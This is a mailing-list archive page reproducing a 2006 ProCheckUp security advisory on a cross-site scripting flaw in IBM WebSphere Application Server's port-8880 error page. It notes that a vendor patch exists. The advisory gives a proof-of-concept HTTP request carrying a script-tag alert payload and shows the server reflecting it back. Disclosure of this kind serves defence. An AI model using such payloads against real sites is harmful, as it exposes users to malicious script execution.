Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[VulnWatch] Cross Site Scripting (XSS) Vulnerability in IBM WebSphere Ap

from [ProCheckUp Research] Network Security [Permanent Link]
Subject: [VulnWatch] Cross Site Scripting (XSS) Vulnerability in IBM WebSphere Application Server
Date: Mon, 06 Nov 2006 13:54:34 +0000 
Title: Cross Site Scripting (XSS) Vulnerability in IBM WebSphere
Application Server

ProCheckUp Security Bulletin

Description: IBM WebSphere Application Server is vulnerable to Cross
Site Scripting through a 'faultfactor' tag in the 500 Internal Server
Error page on port 8880 (default SOAP port).

Date found: 2005-02-27

Vulnerable: This has been tested on WebSphere Application Server version
6.x.  Other versions may be vulnerable but this has not been verified.

Severity: Medium

Author: Nuri Fattah [nuri.fattah@procheckup.com]

Vendor Status:

CVE Candidate: Not Assigned

Description:

WebSphere Application Server is vulnerable to a Cross Site Scripting
attack through the Internal Server Error page used on port 8880 of the
default WebSphere installation.  This may allow the execution of
malicious script code in the browser of an individual who clicks on a
link to a site using the vulnerable version of WebSphere.

Information:

REQUEST:

GET /<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT> HTTP/1.1
Host: 192.168.1.195:8880
Connection: close


RESULTS:

HTTP/1.1 500 Internal Server Error
Server: WebSphere Application Server/6.0
Content-Type: text/xml; charset=utf-8
Content-Length: 3013
Connection: close

<?xml version='1.0' encoding='UTF-8'?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/";
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";
xmlns:xsd="http://www.w3.org/2001/XMLSchema";>
<SOAP-ENV:Header xmlns:ns0="admin" ns0:WASRemoteRuntimeVersion="6.0.0.1"
ns0:JMXMessageVersion="1.0.0" ns0:JMXVersion="1.2.0">
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<SOAP-ENV:Fault>

[output omitted]

<faultactor>/<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT></faultactor>
</SOAP-ENV:Fault>

</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Consequences:

An attacker could cause the execution of malicious script code in the
client of an individual who clicks on a link to a site using the
vulnerable version of WebSphere Application Server.

Fix: IBM has released patches to address this issue. They have tracked
this vulnerability as APAR PK16602.

References: http://www.niscc.gov.uk/niscc/docs/re-20061031-00727.pdf?lang=en

Legal:

Copyright 2005 ProCheckUp Ltd.  All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if the Bulletin is not changed or edited in any way, is attributed
to ProCheckUp, and provided such reproduction and/or distribution is
performed for non-commercial purposes.

Any other use of this information is prohibited.  ProCheckUp is not
liable for any misuse of this information by any third party

[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [VulnWatch] Cross Site Scripting (XSS) Vulnerability in IBM WebSphere Application Server, ProCheckUp Research <=
Previous by Date:  [Full-disclosure] iDefense Security Advisory 11.08.06: Cisco Secure Desktop Privilege Escalation Vulnerability, iDefense Labs
Next by Date:  [VulnWatch] Immediacy .NET CMS possibly vulnerable to Cross Site Scripting through a malformed cookie, ProCheckUp Research
Previous by Thread:  [Full-disclosure] iDefense Security Advisory 11.08.06: Cisco Secure Desktop Privilege Escalation Vulnerability, iDefense Labs
Next by Thread:  [VulnWatch] Immediacy .NET CMS possibly vulnerable to Cross Site Scripting through a malformed cookie, ProCheckUp Research
Indexes:  [Date] [Thread] [Top] [All Lists]